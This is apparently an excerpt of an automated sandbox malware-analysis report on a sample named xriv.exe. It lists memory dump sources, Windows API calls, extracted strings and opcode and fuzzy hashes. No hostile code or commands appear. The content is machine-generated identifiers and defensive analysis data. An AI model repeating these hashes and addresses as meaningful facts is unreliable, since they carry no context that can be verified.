                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: 763d04d7c2b5eb22900290080fb5c93211358bd45026aef842cc4295c8ed608f
                                                          • Instruction ID: 2d431681b84f47dcbcee1140c047ed2340874825637a131cf8f4ac9c01902318
                                                          • Opcode Fuzzy Hash: 763d04d7c2b5eb22900290080fb5c93211358bd45026aef842cc4295c8ed608f
                                                          • Instruction Fuzzy Hash: E9F0A032500224BBCF221F90EC04A9A3F66FB593A4B044014FA1C91230CB728EA0DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SleepConditionVariableCS.KERNELBASE(?,00187157,00000064), ref: 001871DD
                                                          • LeaveCriticalSection.KERNEL32(001A9708,000000FF,?,00187157,00000064,?,?,?,00173E30,001AC468,5D32641E,?,00000000,00198818,000000FF), ref: 001871E7
                                                          • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,00187157,00000064,?,?,?,00173E30,001AC468,5D32641E,?,00000000,00198818,000000FF), ref: 001871F8
                                                          • EnterCriticalSection.KERNEL32(001A9708,?,00187157,00000064,?,?,?,00173E30,001AC468,5D32641E,?,00000000,00198818,000000FF), ref: 001871FF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                          • String ID:
                                                          • API String ID: 3269011525-0
                                                          • Opcode ID: f3c7bce297783768bb80bab5b43fff7e0ea5fef90bd3cab92e2a93f90472c380
                                                          • Instruction ID: 9f8be105774642a6010cdf98b6beb4d9f41b0a44e3a2ff1e24451fa99a3ab6aa
                                                          • Opcode Fuzzy Hash: f3c7bce297783768bb80bab5b43fff7e0ea5fef90bd3cab92e2a93f90472c380
                                                          • Instruction Fuzzy Hash: 56E0123A555124B7CB026FD4EC09AD97E59FB0AB72B010022F50566970C77199C09FF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0018C8C4
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 0018C8D7
                                                          • _free.LIBCMT ref: 0018C8E8
                                                          • _free.LIBCMT ref: 0018C8F9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 959569b61a1e564c9556ef587aa43e6b46c4fc5c26ada5b96523d814ed278188
                                                          • Instruction ID: 8f6593400d3be3ce56afdee7066195a9ffdc5a4d00d5df9f5f5e8549c9ec0da3
                                                          • Opcode Fuzzy Hash: 959569b61a1e564c9556ef587aa43e6b46c4fc5c26ada5b96523d814ed278188
                                                          • Instruction Fuzzy Hash: EEE0BF714006269AC7027F14FD0188D3B75AB96B30391C007F5282AA75FB3607D5DF86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          • Opcode ID: 2e91d6d383c731ca7411ea2a7d95e8340d1483974194feba214463dca0a4f9b1
                                                          • Instruction ID: 2b286b14a4733472213a90f87a98802132989d88df6311ab86516882c0548a38
                                                          • Opcode Fuzzy Hash: 2e91d6d383c731ca7411ea2a7d95e8340d1483974194feba214463dca0a4f9b1
                                                          • Instruction Fuzzy Hash: C82291B0D052589BEF25E724CD9A7DDBB75AB22304F5481D8D40D27283EB751F888F92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                          • API String ID: 0-4106172500
                                                          • Opcode ID: c1dee6f82041d82ebf8cddd2683cd6715e5509d0f3fff295d6924513df48ed46
                                                          • Instruction ID: 88f21fdfa88d8a2ad9bf5d671b1b8e6e5ce4f498b578c0550fcc7f31d1a609d5
                                                          • Opcode Fuzzy Hash: c1dee6f82041d82ebf8cddd2683cd6715e5509d0f3fff295d6924513df48ed46
                                                          • Instruction Fuzzy Hash: 8841A275A04218EFCB22EF999C8199EBBF8EB95350F100066F504EB251D7708B80DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00188FA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 2118026453-2084237596
                                                          • Opcode ID: 3749d36103dfcdb0c2ba84fa81ba52e18fceda1efcd983c7482836c25caae1a8
                                                          • Instruction ID: 4714bbf4a0e3ce36b9953eca866c36c31e1c0fab92769ba168df674254216150
                                                          • Opcode Fuzzy Hash: 3749d36103dfcdb0c2ba84fa81ba52e18fceda1efcd983c7482836c25caae1a8
                                                          • Instruction Fuzzy Hash: 3A411A71900209AFCF15EFA8DD81AEEBBB5FF48304F184159F904A7251D7359A51DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00182093
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileModuleName
                                                          • String ID: 5120$H
                                                          • API String ID: 514040917-2391956277
                                                          • Opcode ID: a549f61c0f782d51b8400e8d519ce676df4cc00c755c7aa6594a4ad50f655f6d
                                                          • Instruction ID: 21f516f355cfa13bf31ce763886417e4033d135882834e256590f65bc6015671
                                                          • Opcode Fuzzy Hash: a549f61c0f782d51b8400e8d519ce676df4cc00c755c7aa6594a4ad50f655f6d
                                                          • Instruction Fuzzy Hash: 472189B0900348ABDB18FF28C9967DD7FB9AB16344F5402CCE54967282D7755B488FA3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%